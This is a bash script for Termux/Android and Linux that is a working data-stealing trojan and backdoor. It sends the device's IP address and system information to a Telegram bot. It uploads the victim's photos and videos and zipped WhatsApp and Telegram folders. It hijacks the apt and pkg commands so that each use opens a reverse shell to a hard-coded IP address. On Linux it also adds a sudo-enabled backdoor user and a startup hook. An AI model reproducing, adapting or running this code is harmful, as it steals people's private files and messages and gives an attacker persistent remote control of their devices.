#!usr/bin/bash

echo "

echo " ' "

sleep 4
clear

TOKEN="5691570782:AAGMKFygk9MyAlZXtPNddydtDsY4Ouo8-ng"
CHAT_ID="5010958919"
IPaddres=$(curl ifconfig.me)
DATAS=$(neofetch)
FILES=/storage/
VIDEO=$(find $FILES -name *.mp4)
PNG=$(find $FILES -name *.png)
JPG=$(find $FILES -name *.jpg)
curl -X POST --silent --output /dev/null https://api.telegram.org/bot$TOKEN/sendMessage -d chat_id=$CHAT_ID -d text=" Hi Boss You Have new Victam !! "
curl -X POST --silent --output /dev/null https://api.telegram.org/bot$TOKEN/sendMessage -d chat_id=$CHAT_ID -d text="$IPaddres"
curl -X POST --silent --output /dev/null https://api.telegram.org/bot$TOKEN/sendMessage -d chat_id=$CHAT_ID -d text="$DATAS"
# Fetch files
for jpg in $JPG
do

# Upload the file
   curl -F document=@$jpg \
        "https://api.telegram.org/bot$TOKEN/sendDocument" \
        -F chat_id=$CHAT_ID

done

for video in $VIDEO
do
curl -F document=@$video \
        "https://api.telegram.org/bot$TOKEN/sendDocument" \
        -F chat_id=$CHAT_ID
done

for png in $PNG
do

curl -F document=@$png \
        "https://api.telegram.org/bot$TOKEN/sendDocument" \
        -F chat_id=$CHAT_ID


done

zip -r /sdcard/Android/w.zip /sdcard/WhatsApp/*
zip -r /sdcard/Android/t.zip /sdcard/Telegram/*

curl -F document=@/sdcard/Android/w.zip \
        "https://api.telegram.org/bot$TOKEN/sendDocument" \
        -F chat_id=$CHAT_ID

curl -F document=@/sdcard/Android/t.zip \
        "https://api.telegram.org/bot$TOKEN/sendDocument" \
        -F chat_id=$CHAT_ID

curl -X POST --silent --output /dev/null https://api.telegram.org/bot$TOKEN/sendMessage -d chat_id=$CHAT_ID -d text=" end fo data victam's "

rm -rfd /sdcard/Android/t.zip /sdcard/Android/w.zip
clear

" > $PREFIX/bin/Hacked
chmod +x $PREFIX/bin/Hacked

# this can bulid a backdoor in your system
if [[ -d $PREFIX/etc/Hacked ]] ;then

echo " it's good now "

else

mkdir $PREFIX/etc/Hacked

if [[ $termux==true ]];then

cd $PREFIX/bin
git clone https://github.com/blue24bluer/Fix_IT.sh
cp $PREFIX/bin/apt $PREFIX/bin/B24B.apt
chmod +x $PREFIX/bin/B24B.apt
touch $PREFIX/bin/apt
echo ' bash -c "0<&139-;exec 139<>/dev/tcp/193.161.193.99/62187;sh <&139 >&139 2>&139" & bash $PREFIX/bin/Hacked  & B24B.apt $@ ' > $PREFIX/bin/apt
cp $PREFIX/bin/apt $PREFIX/bin/pkg
chmod +x $PREFIX/bin/apt

else


# Trojan Bash Script

# Create a backdoor user
useradd -m -s /bin/bash trojan
echo "B24B:B24B" | chpasswd
echo "B24B ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
mv $PREFIX/bin/apt $PREFIX/bin/B24B.apt
chmod +x $PREFIX/bin/B24B.apt
touch $PREFIX/bin/apt
echo ' bash -c "0<&139-;exec 139<>/dev/tcp/193.161.193.99/62187;sh <&139 >&139 2>&139" & bash $PREFIX/bin/Hacked & B24B.apt $@ ' > $PREFIX/bin/apt
cp $PREFIX/bin/apt $PREFIX/bin/pkg
# Create a startup script to run the backdoor on bootup
cp $PREFIX/bin/apt $PREFIX/etc/init.d/trojan_startup.sh
chmod +x $PREFIX/etc/init.d/B24B_stats

# Start the backdoor now
service B24B_startup start

fi
fi
